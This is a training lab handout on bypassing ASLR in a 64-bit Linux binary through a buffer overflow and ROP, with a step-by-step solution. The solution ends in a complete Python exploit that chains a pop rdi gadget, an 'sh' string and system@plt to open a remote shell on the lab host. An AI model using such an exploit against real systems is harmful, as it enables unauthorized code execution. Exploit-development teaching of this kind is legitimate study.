Linux x64 ASLR Bypass

LAB 16

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 1
 SCENARIO
In this lab you will continue to learn x64 Linux exploitation. Both the Operating System
(Ubuntu 16) and the target binary are 64-bit. The Ubuntu system features ASLR. You will
have to find a way around it.

You can connect to the lab machine via SSH. The target IP is 172.16.172.152

In case you need root-level access for debugging, the user below is able to run sudo.

The SSH credentials are the following.

Username: xdev
Password: xdev

GOALS
• Discover vulnerabilities in the binary
• Utilize ROP
• Spawn an interactive bash shell

WHAT YOU WILL LEARN

• Exploiting 64-bit buffer overflows
• Utilizing ROP during buffer overflows
• Bypassing ASLR

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 2
 RECOMMENDED TOOLS
• Gdb / gdb-peda
• ROPgadget
• Text editor
• Kali linux

NETWORK CONFIGURATION &

CREDENTIALS
• Penetration tester’s Subnet: 172.16.172.0/24

• Vulnerable machine: 172.16.172.152

• Connection Type: SSH

ssh [email protected]
password: xdev

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 3
 TASKS
TASK 1: CONNECT TO THE COMPROMISED MACHINE
AND EXAMINE THE TARGET BINARY
The target binary is named bypass_aslr and is available in the xdev user’s Desktop directory.
As your first task, try to identify vulnerabilities within the binary.

Remember that:

1. The target Ubuntu system has ASLR enabled

2. The binary features no protections

TASK 2: FURTHER EXAMINE THE BINARY AND IDENTIFY

A STRATEGY TO BYPASS ASLR
As you have figured out in Task 1, we can overwrite the return address. We can try returning
to interesting functions but to do so, we need predictability.

Try to find a ROP gadget within the binary itself, where we will return first in order for the
argument’s address to be popped into an appropriate register. Then, the function will be
called.

Hints:

1. Leverage the system() function that the binary features

2. The rdi register can accommodate the system’s argument
3. Try searching for occurrences of “sh” within the binary

TASK 3: CREATE A POC EXPLOIT AND LAUNCH IT

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 4
It is time to combine all the above into a working exploit. Serve bypass_aslr with socat on
the remote machine and then launch the exploit from your attacker’s machine to see if it
works.

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 5
SOLUTIONS

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 6
Below, you can find solutions for each task. Remember though that you can follow your
own strategy (which may be different from the one explained in the following lab).

TASK 1: CONNECT TO THE COMPROMISED MACHINE

AND EXAMINE THE TARGET BINARY
Let’s start by interacting with the binary. We see that it asks for user input once and then
exits.

Let’s see how this program copes with overly large inputs. Gdb-peda’s pattern create will
be used to create an overly long input.

Let’s execute ulimit -c unlimited first and then provide the binary with the above input.

It looks like we managed to crash the target binary. Let’s utilize the dumped core file to
identify if we were able to overwrite the return address.

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 7
Like in the Linux x64 Basic Stack Overflow lab, we receive no conclusive information about
the rip register. Let’s see the state of the other registers. Maybe we will have to utilize the
rbp as we did on that lab.

Indeed, rbp seems to contain a portion of our sent buffer/payload. Let’s use it to calculate
the offset.

The offset to overwrite rip is 120 (112 + 8).

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 8
 TASK 2: FURTHER EXAMINE THE BINARY AND IDENTIFY
A STRATEGY TO BYPASS ASLR
Let’s now focus on the functions the target binary includes.

The system function is particularly interesting.

Let’s note its address down.

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 9
In order for system to be exploitable, we need to pass it an “sh” argument.

Let’s check for “sh” occurrences within the binary, as follows.

b *main+8 was chosen randomly

Luckily, there are “sh” occurrences within the binary (this ensures predictability).

Let’s now write the first “sh”’s address down. We will pass “sh” as an argument to system to
obtain a shell.

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 10
Finally, it’s time to search for a ROP gadget within the binary, where we will return first in
order for the argument’s address to be popped into the rdi register Then, the function will
be called.

This can done with the help of ROPgadget done, as follows.

(Execute cd ~ to find the ROPgadget tool’s directory)

Let’s also note this address down.

TASK 3: CREATE A POC EXPLOIT AND LAUNCH IT

All the above, can be incorporated into a working exploit, as follows.

from struct import pack

from telnetlib import Telnet

p64 = lambda x: pack("Q",x) #convert to little endian

print "[*] Connecting to server !!"
p=Telnet('172.16.172.152',5556) #connect to server
print "[*] Connected."
pop_rdi=0x4007f3 #address to pop rdi;ret
system_plt=0x400590 #address to system@plt entry
sh=0x40085c #address of 'sh' string

print p.read_until(">") #start reading

buf = "A"*120 #junk

buf+=p64(pop_rdi) #pop rdi;ret
buf+=p64(sh) # 'sh' goes into rdi

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 11
buf+=p64(system_plt) # system

print "[*] Sending payload .."

p.write(buf+'\n') #send payload
print "[*] Got shell. Enter commands."
p.interact()

To test the exploit above, first serve bypass_aslr using socat.

Then, from inside your attacking machine launch the exploit. You should see the below.

© 2019 Caendra Inc. | Hera for XDS | Linux x64 ASLR Bypass 12